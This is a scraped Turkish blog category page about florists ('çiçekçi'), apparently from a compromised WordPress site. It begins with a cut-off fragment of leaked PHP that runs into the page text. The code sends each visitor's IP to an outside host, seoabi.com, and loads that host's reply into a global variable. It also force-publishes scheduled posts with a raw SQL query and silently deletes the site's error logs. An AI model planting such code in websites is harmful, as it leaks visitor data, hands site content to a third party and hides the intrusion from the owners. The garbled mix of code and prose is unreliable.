$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> çiçekçi | Teknoloji Haberleri

çiçekçi kategorisindeki tüm yazılar

Son Yazılar

ÇİÇEKÇİ KİMDİR?

  Çiçekleri yetiştiren, çiçeklerin ve kullanacağı malzemelerin tedarik edileceği yerleri belirleyip temin eden, çiçekleri türlerine göre ayırıp, çiçekleri kullanacak hale getiren, satış yaptığı ortama göre dükkânın dış ve iç süslemelerini düzenlemelerini yapan, müşterilerden gelen taleplere göre, çiçek buketi, çiçek sepeti ve çelenk hazırlayan, fiyatlarını belirleyip etiketlerini hazırlayan